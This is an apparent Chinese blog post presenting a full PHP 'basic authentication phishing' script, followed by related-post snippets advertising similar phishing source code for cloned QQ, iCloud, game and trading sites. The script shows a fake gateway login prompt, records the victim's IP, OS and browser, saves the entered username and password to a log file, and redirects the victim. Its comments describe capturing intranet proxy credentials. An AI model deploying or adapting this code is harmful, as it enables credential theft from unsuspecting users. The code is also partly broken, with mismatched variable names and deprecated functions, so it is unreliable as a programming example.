PHP 基础认证钓鱼脚本

最新推荐文章于 2021-04-07 03:20:28 发布
最新推荐文章于 2021-04-07 03:20:28 发布
阅读量1.4k 收藏 2
点赞数
分类专栏: Hacking T00ls
Hacking 同时被 2 个专栏收录
264 篇文章 1 订阅
订阅专栏
T00ls
111 篇文章 2 订阅
订阅专栏 
<?php
function getBrowse() { 
    global $_SERVER; 
    $Agent = $_SERVER['HTTP_USER_AGENT']; 
    $browser = ''; 
     $browserver = ''; 
     $Browser = array('Lynx', 'MOSAIC', 'AOL', 'Opera', 'JAVA', 'MacWeb', 'WebExplorer', 'OmniWeb'); 
     for($i = 0; $i <= 7; $i ++){ 
       if(strpos($Agent, $Browsers[$i])){ 
         $browser = $Browsers[$i]; 
         $browserver = ''; 
       } 
     } 
         if(ereg('Mozilla', $Agent) && ereg('Maxthon', $Agent)){ 
       $temp = explode('Maxthon/', $Agent); 
       $Part = $temp[1]; 
       $temp = explode(' ', $Part); 
       $browserver = $temp[0]; 
       $browser = 'Maxthon'; 
     } 
     if(ereg('Mozilla', $Agent) && ereg('Chrome', $Agent) && !ereg('Maxthon', $Agent)){ 
       $temp = explode('Chrome/', $Agent); 
       $Part = $temp[1]; 
       $temp = explode(' ', $Part); 
       $browserver = $temp[0]; 
       $browser = 'Chrome'; 
     } 
     if(ereg('Mozilla', $Agent) && ereg('Opera', $Agent)) { 
       $temp = explode('(', $Agent); 
       $Part = $temp[1]; 
       $temp = explode(')', $Part); 
       $browserver = $temp[1]; 
       $temp = explode(' ', $browserver); 
       $browserver = $temp[2]; 
       $browserver = preg_replace('/([d.]+)/', '\1', $browserver); 
       $browserver = $browserver; 
       $browser = 'Opera'; 
     } 
     if(ereg('Mozilla', $Agent) && ereg('MSIE', $Agent)){ 
       $temp = explode('(', $Agent); 
       $Part = $temp[1]; 
       $temp = explode(';', $Part); 
       $Part = $temp[1]; 
       $temp = explode(' ', $Part); 
       $browserver = $temp[2]; 
       $browserver = preg_replace('/([d.]+)/','\1',$browserver); 
       $browserver = $browserver; 
       $browser = 'Internet Explorer'; 
     } 
     if($browser != ''){ 
       $browseinfo = $browser.' '.$browserver; 
     } else { 
       $browseinfo = 'Unknow Browser'; 
     } 
     return $browseinfo; 
   } 

function getIP () { 
     global $_SERVER; 
     if (getenv('HTTP_CLIENT_IP')) { 
       $ip = getenv('HTTP_CLIENT_IP'); 
     } else if (getenv('HTTP_X_FORWARDED_FOR')) { 
       $ip = getenv('HTTP_X_FORWARDED_FOR'); 
     } else if (getenv('REMOTE_ADDR')) { 
       $ip = getenv('REMOTE_ADDR'); 
     } else { 
       $ip = $_SERVER['REMOTE_ADDR']; 
     }
     return $ip;
   } 

function getOS () { 
     global $_SERVER; 
     $agent = $_SERVER['HTTP_USER_AGENT']; 
     $os = false; 
     if (eregi('win', $agent) && strpos($agent, '95')){ 
       $os = 'Windows 95'; 
     } 
     else if (eregi('win 9x', $agent) && strpos($agent, '4.90')){ 
       $os = 'Windows ME'; 
     } 
     else if (eregi('win', $agent) && ereg('98', $agent)){ 
       $os = 'Windows 98'; 
     } 
         else if (eregi('win', $agent) && eregi('nt 6.1', $agent)){ 
       $os = 'Windows 7'; 
     }
         else if (eregi('win', $agent) && eregi('nt 6', $agent)){ 
       $os = 'Windows Vista'; 
     }          
     else if (eregi('win', $agent) && eregi('nt 5.1', $agent)){ 
       $os = 'Windows XP'; 
     } 
     else if (eregi('win', $agent) && eregi('nt 5', $agent)){ 
       $os = 'Windows 2000'; 
     } 
     else if (eregi('win', $agent) && eregi('nt', $agent)){ 
       $os = 'Windows NT'; 
     } 
     else if (eregi('win', $agent) && ereg('32', $agent)){ 
       $os = 'Windows 32'; 
     } 
     else if (eregi('linux', $agent)){ 
       $os = 'Linux'; 
     } 
     else if (eregi('unix', $agent)){ 
       $os = 'Unix'; 
     } 
     else if (eregi('sun', $agent) && eregi('os', $agent)){ 
       $os = 'SunOS'; 
     } 
     else if (eregi('ibm', $agent) && eregi('os', $agent)){ 
       $os = 'IBM OS/2'; 
     } 
     else if (eregi('Mac', $agent) && eregi('PC', $agent)){ 
       $os = 'Macintosh'; 
     } 
     else if (eregi('PowerPC', $agent)){ 
       $os = 'PowerPC'; 
     } 
     else if (eregi('AIX', $agent)){ 
       $os = 'AIX'; 
     } 
     else if (eregi('HPUX', $agent)){ 
       $os = 'HPUX'; 
     } 
     else if (eregi('NetBSD', $agent)){ 
       $os = 'NetBSD'; 
     } 
     else if (eregi('BSD', $agent)){ 
       $os = 'BSD'; 
     } 
     else if (ereg('OSF1', $agent)){ 
       $os = 'OSF1'; 
     } 
     else if (ereg('IRIX', $agent)){ 
       $os = 'IRIX'; 
     } 
     else if (eregi('FreeBSD', $agent)){ 
       $os = 'FreeBSD'; 
     } 
     else if (eregi('teleport', $agent)){ 
       $os = 'teleport'; 
     } 
     else if (eregi('flashget', $agent)){ 
       $os = 'flashget'; 
     } 
     else if (eregi('webzip', $agent)){ 
       $os = 'webzip'; 
     } 
     else if (eregi('offline', $agent)){ 
       $os = 'offline'; 
     } 
     else { 
       $os = 'Unknown'; 
     } 
     return $os; 
}

function getReferer()
{
        global $_SERVER;
        if(isset($_SERVER['HTTP_REFERER']) and $_SERVER['HTTP_REFERER'] !="")
                return $_SERVER['HTTP_REFERER'];
        else
                return "";
}

function getTime()
{
        return date("Y-m-d h:i:s A",time());
}

function getbasic()
{
                $input = $_SERVER['PHP_AUTH_USER'];
                if (!isset($input))
                {
                        header('WWW-Authenticate: Basic realm="McCafe Gateway  Authenticate"');//让用户输入内网代理账户密码
                        header('HTTP/1.0 401 Unauthorized');
                        echo '<script>alert(\'Account password input error\');</script>'; //提示认证失败,并没有输入账户密码
                        $err = 'IP:'.getIP()."\t".'OS:'.getOS()."\t".'Browser:'.getBrowse() . "\t" ."\t" . "\t" . "Referer:" . getReferer() . "\t" . "\t" . "Time:" .getTime();
                        $fp = fopen("error.log","a+"); //写入失败日志
                        fwrite($fp,$err);
                        fwrite($fp,"\r\n\r\n");
                        fclose($fp);
                }else
                {
                        $user = $_SERVER['PHP_AUTH_USER']; //定义user
                        $pwd = $_SERVER['PHP_AUTH_PW']; //定义password
                        $str = 'IP:'.getIP()."\t".'OS:'.getOS()."\t".'Browser:'.getBrowse() . "\t" ."\t" . "\t" . "Referer:" . getReferer() . "\t" . "\t" . "Time:" .getTime()."\t"."username:".$user."\t"."password:".$pwd; 
                        $file = fopen("log.log","a+"); //写入文件
                        fwrite($file,$str);
                        fwrite($file,"\r\n\r\n");
                        fclose($file);
                        header("Location: [url]http://www.google.com/[/url]"); //成功就跳转,跳转地址自己定义。根据目标网站类型不同跳转。
                }
                
}
getbasic();

?>
7禧
关注
专栏目录
基础认证钓鱼代码编写
JackholeLiu的博客
04-08 1563
最近在学XSS,想写一个基础认证钓鱼的利用代码,同样是在网上找了半天没发现任何能用的,只好自己改写了 首先了解一下基础认证钓鱼的原理 Basic Auth:   客户端在输入用户名密码后发送请求,浏览器会用一个冒号“:”将用户名和密码连接起来,然后做一下Base64编码,就直接把这个编码后的字符串放到Authorization头部里发给服务器了。 基础认证登陆模拟(当然else if 后
绝地求生钓鱼php源码,(搬运)好像是绝地求生的无后座源码!
weixin_28697603的博客
04-02 1894
我直接按照原文搬运来好了,免得我解释的不正确,希望有能力的大触教一教这个东西有什么效果,怎么使用:Hello guys.I'm here today to bring you a source code from an anti-recoil macro to pubg:sens:=3.0zoomsens:=0.9key_ump:="F1"key_uzi:="F2"key_akm:="F3"key...
PHP实现简单的仿QQ空间登录界面钓鱼(仅供参考测试不可用于非法用途)
01-08
声明:此代码仅供参考不可用于非法用途,非法使用造成的后果自负 演示:界面 点击提交后账号和密码会被写入txt文本中,同时页面跳转 <?php if (isset($_POST[user])) { if (isset($_POST[pass])) { $myfile = fopen(abc.txt, a)/*abc.txt用于接收提交数据*/ or die(Unable to open file!); $txt = ━━━━账号=.$_POST[user]. 密码=.$_POST[pass];//$_POST[user]这个变量的意思,在所有post
PHP钓鱼教程,记录一次wifi钓鱼的调试 ——新手
weixin_26997697的博客
03-29 431
最近在学习一个wifi钓鱼的东西,模拟某网站(以下简称A)的登录,并在后台储存账号密码到数据库中。原理很简单,将A的网页下载下来放到本地服务器上,然后搭建wifi,使连接wifi的人访问登录界面时实际上是访问本地服务器。本来模块挺成熟了,前两天测试正常,今天测试的时候发现点了登录没反应???倒腾半天无果。但是不是完全没用。当我输入A的ip时,点击登录没有反应,但是当我输入127.0.0.1访问A时...
php怎么弄钓鱼,如何使用PHP和JS实现模仿登录钓鱼
weixin_35868872的博客
03-10 453
如何使用PHP和JS实现模仿登录钓鱼发布时间:2020-07-16 11:55:37来源:亿速云阅读:67作者:Leah如何使用PHP和JS实现模仿登录钓鱼?很多新手对此不是很清楚,为了帮助大家解决这个难题,下面小编将为大家详细讲解,有这方面需求的人可以来学习下,希望你能有所收获。目录介绍login.php 正常登录的文件selfLogin.php 自定义的登录文件data.txt 记录用户输...
openwrt php wifi 钓鱼,Openwrt自动扫描WiFi并连接中继
weixin_42210038的博客
04-07 881
最近入手了一个非常迷你的路由器——由25 x 25mm的vocore开发板搭建成的超小路由器,配上外壳后,也仅仅是37.4 x 34 x 25.9mm,比一个随身WiFi稍大。(链接)vocore路由器虽然很小,但是配置却不低CPU 处理器:雷凌 RT5350 360MHz MIPS 24KEcMemory 内存:32MB 133MHz SDRAMFlash 闪存:16MB扩展接口:SPI I2C...
利用XSS进行网页钓鱼
Monsterlz123的博客
07-22 6682
【XSS漏洞】利用XSS进行网页钓鱼 Hello 各位小伙伴周末晚上好 这里是你们微胖的小编Monster。 话说小编的老妈今天给小编打电话,叮嘱我平时吃饭少吃一点… 说昨天看我朋友圈发的照片,已经从以前的瓜子脸,变成国字脸了… Whatever,让我们一起来看看今天的内容吧 一、实验概述 实验拓扑: 利用XSS漏洞,我们可以在网页中插入恶意js代码,通过js代码,我们可以干很多事情,例...
浅谈微软认证Outlook Web Access钓鱼(Outlook Web Access Phishing)
安全爱好者的博客
02-27 1764
安全人员在进行安全测试的时候,会对一个企业进行整体评估,当然测试的项目很多,需要历时数日再可见到效果,其中一项很重要的环节就是钓鱼,很多测试人员只是知道有这个名词,却不会去用这项技能,很遗憾的一件事情,那么这次我们就讲解一下如何一步一步的进行钓鱼活动。 环境可以是你抓到的肉鸡或者申请域名指向空间。 技术手段就是如下几步: 1、用工具HTTrack Website Copier 克隆一个网站。
PHP代码审计分段讲解.zip
08-04
在IT行业中,PHP是一种广泛应用的服务器端脚本语言,尤其在网页开发中占据了重要的地位。然而,由于编程过程中的疏忽或对安全性的忽视,PHP应用程序可能会存在各种漏洞。"PHP代码审计分段讲解.zip"这个压缩包文件...
易语言源码易语言与PHP加密通讯协议源码.rar
02-18
HTTPS是在HTTP基础上加入了SSL/TLS层,提供了一种加密传输和身份认证的方式,能有效防止中间人攻击。源码中可能会包含对SSL/TLS的封装和调用,以及对请求和响应的处理逻辑。 此外,源码可能还涉及到数字签名和证书...
在网站中开发集成QQ登录源代码php
10-17
在网站中开发集成QQ登录源代码php 网站中集成QQ登录时要理解的一些基本概念: 1、集成QQ登录是让我们网站的会员可以使用QQ的会员账号登录到我们自己的网站上,QQ会员授权我们网站的基本信息包括:会员昵称、头像、性别。但不包括其他的信息,如QQ号码等 2、QQ帮助我们做一个会员身份验证服务,但我们不能取得QQ会员授权之外的信息。 3、QQ的API会帮助我们做身份验证,但网友可能是第一次进入我们的网站,QQ登录成功后在我们的网站上需要进行多种操作,如:绑定网站会员、注册新会员等,为执行这些操作而不需网友反复输入QQ会员帐号和密码,所以我们要建立一个表qq_user,用于临时存储已登录的QQ会员信息,mysql表设计详见文件包。 4、手机版网页也可以使用QQ登录,详见文件包。 5、如何修改callback地址 文件:\qq\API\comm\inc.php <?php die('forbidden'); ?> {"appid":"101858723","appkey":"e9aa5b79e4ae8ee7e4fe481ac721a8dd","callback":"http://www.myweb.com/qq.php","scope":"get_user_info","errorReport":true,"storageType":"file","host":"localhost","user":"root","password":"root","database":"test"} 修改:http://www.myweb.com/qq.php成你自己的callback文件地址即可 另外:"appid":"101858723","appkey":"e9aa5b79e4ae8ee7e4fe481ac721a8dd",这些部分也改成你自己的网站信息
最新 QQ网站源码
06-16
QQ网站源码
最新仿icloud官方源码,苹果官网源码带后台邮件提醒功能
11-20
最新仿icloud官方源码,苹果官网源码带后台邮件提醒功能,自定义手机版,pc版,2次密保验证,直供学习源码之用,切勿用于非法!
2020最新版本交易猫钓鱼源码完整版zip
10-27
2020最新版本交易猫钓鱼源码完整版 数据库修改:config/Conn.php 然后导入数据库就行 后台账号admin 密码123456 仅供参考学习
王者荣耀钓鱼网源码php,王者荣耀钓鱼页面
weixin_34770855的博客
03-18 2179
【实例简介】仅供参考学习,请勿非法用途【实例截图】【核心代码】王者荣耀网站钓鱼源码├── admin│ ├── Exit.asp│ ├── Q.asp│ ├── Q1.asp│ ├── Top.asp│ ├── about.asp│ ├── addreg.asp│ ├── check.asp│ ├── conn.asp│ ├── data.asp│ ├── ...
401认证钓鱼demo
09-13 674
<?php //@b4dboy if(!isset($_SERVER['PHP_AUTH_USER']) && !isset($_SERVER['PHP_AUTH_PW'])) { Header("WWW-Authenticate: Basic realm=\"USER LOGIN\""); Header("HTTP/1.0 401 Un...
php高级钓鱼源码,Test Page for Apache Installation
weixin_35507450的博客
03-17 465
If you are a member of the general public:The fact that you are seeing this page indicates that the website you just visited is either experiencing problems, or is undergoing routine maintenance.If yo...
球球大作战钓鱼源码php,球球大作战,源码分享
weixin_32705179的博客
03-11 451
该楼层疑似违规已被系统折叠隐藏此楼查看此楼#include "qiu.h"int main(){initgraph(800, 600);mciSendString("open res/彩豆森林.mp3 alias mus", NULL, NULL, NULL);//加载音乐for(int i=0;i<200;i++)loadimage(&img[i], "res/1.jpg",i,...
401基础认证钓鱼的实验结果分析
最新发布
04-27
401基础认证钓鱼实验是一种网络安全攻击技术,其目的是欺骗用户向攻击者提供其用户名和密码等敏感信息。通过对实验结果的分析,可以了解攻击者可能采用的方法和用户应该如何防范此类攻击。 在实验中,攻击者会伪造一个与正常网站相似的页面,并要求用户输入其用户名和密码等敏感信息。攻击者可以采用多种方式来欺骗用户,例如通过电子邮件、社交媒体等途径发送链接,诱导用户点击链接并进入伪造的页面,或者在公共场所设置无线网络并让用户连接到该网络等等。 用户如果没有警惕,可能会轻易地被攻击者欺骗,将其敏感信息输入到伪造的页面中。攻击者会收集这些信息,并可能会以各种方式利用它们,例如盗取用户的账号信息、进行金融欺诈等。 用户应该采取一些措施来防范此类攻击,例如不随意点击未知来源的链接,不在公共网络中输入敏感信息,使用双因素认证等。此外,网站管理员也应该采取一些措施来提高网站的安全性,例如加强对用户输入的敏感信息的保护,定期更新网站的安全策略等等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值